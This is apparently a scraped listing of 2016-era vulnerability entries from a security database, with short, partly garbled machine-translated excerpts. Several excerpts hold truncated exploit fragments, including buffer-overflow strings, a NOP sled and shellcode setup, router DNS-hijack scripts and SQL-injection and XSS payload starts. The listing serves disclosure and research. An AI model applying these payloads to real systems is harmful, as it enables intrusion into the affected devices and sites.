Mastery OA /pda/apps/report/getdata.php arbitrary file upload

No description provided by source...

Google Chrome MailboxManagerImpl the process of repeated reading vulnerability

No description provided by source...

Apple OS X < 10.11.5 iMessage denial of service vulnerability

Apple OS X in 10.11.5 version before error processing the file name encoding issues causing denial of service vulnerability. Specific vulnerability mining ideas can be in the Paper in the view: http://paper.seebug.org/65/ 发送以下文件名的附件可触发此漏洞 zzzzzz.htm 1x;color/red;aaa/...

Joomla Huge-IT Video Gallery 1.0.9 ajax_url.php parameter galleryid SQL injection vulnerability

No description provided by source...

Chrome Address Bar URL Spoofing on IOS

来源链接： http://xlab.tencent.com/cn/2016/10/11/CVE-2016-1707-Chrome-Address-Bar-URL-Spoofing-on-IOS/ （英文版）http://xisigr.com/x/cve-2016-1707/ 0x00 Vulnerability Overview Chrome浏览器地址栏欺骗漏洞CVE-2016-1707，这个漏洞笔者于2016年6月报告给Google，现在把漏洞细节分享给大家。URL Spoofing漏洞可以伪造一个合法的网站地址。攻击者可以利用这个漏洞对用户发起网络钓鱼攻击。 受影响版本：Chrome...

Joomla Event Booking Component parameter date SQL injection vulnerability

No description provided by source...

OpenJPEG JPEG2000 mcc record remote code execution vulnerability

No description provided by source...

WDK 8.1 kill. exe memory corruption vulnerability

No description provided by source. import subprocess junk="A"508+"RRRR" pgm='c:\Program Files x86\Windows Kits\8.1\Debuggers\x86\kill.exe ' subprocess.Popenpgm, junk, shell=False...

Disk Pulse Enterprise remote code execution vulnerability

Vulnerability reproduction Disk Pulse Eneterprise is a monitoring disk changes the software, it can be through a management port 9120 or the web Management window 80 on software for connection management, which monitors the disk changes. In Disk Pulse Eneterprise中有一个动态链接库libspp.dll, some of which...

Three Yuan up to the wireless AP WPB-5000 arbitrary file read vulnerability

No description provided by source...

FineCMS AttachmentController arbitrary file upload vulnerability

Source link: http://www.hackersb.cn/shenji/170.html Is still AttachmentController, of course, this is no longer kindeditorupload upload the file and then include the file so simple, but directly uploaded the script execution. This time the problem is ajaxswfuploadAction method, the method code is...

Wordpress <= 4.6.1 using the language file arbitrary code execution vulnerability

Author: p0wd3r know Chong Yu 404 security lab 0x00 vulnerability overview 1. Vulnerability description WordPress is a PHP and MySQL as a platform free and open source blogging software and content management system, recently in github...

Joomla com_remository Component path disclosure vulnerability

No description provided by source...

D-Link DCS IP camera 7411 command execution vulnerability

No description provided by source...

phpok framework/model/wealth. php injection

No description provided by source...

Mastery OA /general/mytable/intel_view/video_file.php arbitrary File Download vulnerability

No description provided by source...

Wordpress <= 4.6.1 Stored XSS Via Theme File

Author: p0wd3r 知道创宇404安全实验室 0x00 漏洞概述 1.漏洞简介 WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统，近日研究者发现在其 ... DO NOT CHANGES HERE ... / 接着更改文件夹名字再打包： bash mv illdy "" zip -r theme.zip "" 构造好之后我们登录后台上传该主题文件，同时开始动态调试。 首先进入wp-admin/includes/class-theme-installer-skin.php中第55-82行： php $name =...

Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation

I. VULNERABILITY ------------------------- Apache Tomcat® packaging on Debian-based distros - Local Root Privilege Escalation Affected debian packages: Tomcat 8 = 8.0.36-2 Tomcat 7 = 7.0.70-2 Tomcat 6 = 6.0.45+dfsg-1deb8u1 Ubuntu systems are also affected. See section VII. for details. Other...

Cisco WVC80N camera information disclosure vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re import socket import string import base64 import urlparse def b64wvc80nb64content: stdb64 =...

3S Network Camera weak password vulnerability

No description provided by source...

YMail anti-spam system /ymail/cgi/index. cgi HTTP header injection vulnerability

No description provided by source...

Cisco PVC-2300 camera configuration information disclosure vulnerability

No description provided by source...

ECShop v2. 7. 2 affiche.php parameters uri the URL redirection vulnerability

No description provided by source...

Django CSRF Bypass (CVE-2016-7401)

Author: p0wd3r 知道创宇404安全实验室 Date: 2016-09-28 0x00 漏洞概述 1.漏洞简介 Django是一个由Python写成的开源Web应用框架。在两年前有研究人员在hackerone上提交了一个利用Google Analytics来绕过Django的CSRF防护机制的漏洞CSRF protection bypass on any Django powered site via Google Analytics，通过该漏洞，当一个网站使用了Django作为Web框架并且设置了Django的CSRF防护机制，同时又使用了Google...

Three Yuan up to the wireless AP WPB-5000 permission bypass vulnerability

No description provided by source...

BeesCMS _V4.0_R_20160525 SQL注射(突破全局防护)

后台登录处验证码设计缺陷漏洞 首先是后台登录页面/admin/login.php验证码形同虚设，一次验证后在不刷新的情况下可以多次提交请求。这就为这里的注入提供了前提条件。 SQL Injection 在admin/login.php中，登录处的核心代码是： php //判断登录 elseif$action=='cklogin' global $submit,$user,$password,$sys,$code; $submit=$POST'submit'; $user=flhtmlflvalue$POST'user';...

Khayelihle Tshuma Design gallery.php parameter id SQL injection vulnerability

No description provided by source...

php 5.0 tidy_parse_file buffer overflow vulnerability

No description provided by source...

WordPress Plugin Image Export local file inclusion vulnerability

No description provided by source...

EKG Gadu local code execution vulnerability

No description provided by source. import os, subprocess def run: try: print " EKG Gadu - Local Buffer Overflow by Juan Sacco" print " This Exploit has been developed using Exploit Pack -http://exploitpack.com" NOPSLED + SHELLCODE + EIP buffersize = 240 nopsled = "\x90"30 shellcode =...

Trendnet TV-IP 410WN camera command execution vulnerability

No description provided by source...

QQ browser Wormable Browser vulnerability

Source link: http://blog.pangu.io/wormable-browser/ Vulnerability description Android QQ browser, QQ hot spots and other applications on the local wifi started, it will monitor local 8786 port, and listens to all local ip addresses. When the attacking party and the attacked party is on the same L...

phpok host 头SQL注入漏洞

No description provided by source...

Safari the showModalDialog method UXSS vulnerability

This article translated from: http://mksben.l0.cm/2016/09/safari-uxss-showModalDialog.html （English version） http://masatokinugawa.l0.cm/2016/09/safari-uxss-showModalDialog.html （Japanese version） Author：Masato Kinugawa Translator: Holic know Chong Yu 404 security lab Translator's note: as the...

Safari < 9.1.2 URL redirection vulnerability

This article translated from: http://www.mbsd.jp/blog/20160921.html ,there is changes The original author: a PU ro Fu epolight ッ silicone ョ na Hikaru Cytec ー bldg su division Temple Tian Jian Translator: Holic know Chong Yu 404 security lab Part of the contents of the translation from MBSD, there...

Drupal Core Full config export configuration file unauthorized download vulnerability

Author: p0wd3r know Chong Yu 404 security lab 0x00 vulnerability overview 1. Vulnerability description Drupal （ https://www.drupal.org is a free open source content management system, recent researchers have found in it 8. x 8.1.10 version found three security vulnerabilities, one vulnerability...

Drupal Core 8. x cross-site scripting vulnerability

No description provided by source...

Metasploit Web UI 反序列化导致任意代码执行漏洞

No description provided by source...

Metasploit Weekly Release Static secret_key_base pre-auth 远程代码执行漏洞

Author: Justin Steven OVE ID: OVE-20160904-0002 Private disclosure date: 2016-09-04 Public disclosure date: 2016-09-19 Vendor advisory: https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401 Affected versions: Metasploit...

Mastery OA /inc/finger/use_finger. php file SQL injection vulnerabilities

No description provided by source...

Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass

No description provided by source. Cisco ASA 9.23 Authentication Bypass EXTRABACON Module Copyright: c 2016 RiskSense, Inc. https://risksense.com License: http://opensource.org/licenses/MIT Release Date: September 15, 2016 Authors: Sean Dillon 2E3C8D72353C9B8C9FF797E753EC4C9876D5727B Zachary...

Arabseed XCMS m1.php parameter id SQL injection vulnerability

No description provided by source...

Ruvar OA系统 wf_get_fields_approve.aspx 参数template_id SQL注入漏洞

No description provided by source...

Mastery OA /general/ems/manage/search_excel. php file SQL injection vulnerabilities

Width byte injection occurs the position is that PHP sends a request to the MYSQL character set to use the charactersetclient setting a value for an encoding, the GET parameters if it contains“%df%27”, addslashes encoded into‘\’ variable“%df%5c%27”, in MySQL in the processing use the gbk characte...

Joomla jVoteSystem 2.56 Component parameter keyword XSS vulnerability

0x01 vulnerability profile Joomla jVoteSystem 2.56 Component parameters keyword the presence of a reflective XSS vulnerability. 0x02 vulnerability analysis http://www.9u4u.be/index.php?option=comjvotesystem&view=polls&cat=cw&keyword=1&Itemid=12jvotesystem Construct the following payload: 1"...

NUUO v3. 0. 8 a plurality of models of video products css_parser.php parameters css local file disclosure vulnerability

No description provided by source...

Inteno EG101R1 VoIP Router - unauthorized modifications to DNS

No description provided by source. if $ -gt 3 || $ -lt 2 ; then echo " Inteno EG101R1 VoIP Router " echo " Unauthenticated Remote DNS Change Exploit" echo " ===================================================================" echo " Usage: $0 " echo " Example: $0 133.7.133.7 8.8.8.8" echo "...

Joomla jVoteSystem 2.56 Component parameter keyword time delay injection vulnerability

No description provided by source...

PLANET VDR-300NU ADSL Router - not authorized to modify the DNS

No description provided by source. if $ -gt 3 || $ -lt 2 ; then echo " PLANET VDR-300NU ADSL ROUTER " echo " Unauthenticated Remote DNS Change Exploit" echo " ===================================================================" echo " Usage: $0 " echo " Example: $0 133.7.133.7 8.8.8.8" echo "...

PHPCMS V9 version of the background design flaws lead to arbitrary code execution vulnerability

Source link: http://www.cnbraid.com/ 0x01 background Since the default after installation requires Super administrator privileges, so the vulnerability is very tasteless, but the feeling should be in other cms, there are also, so the main share under the mining idea PS: using the test environment...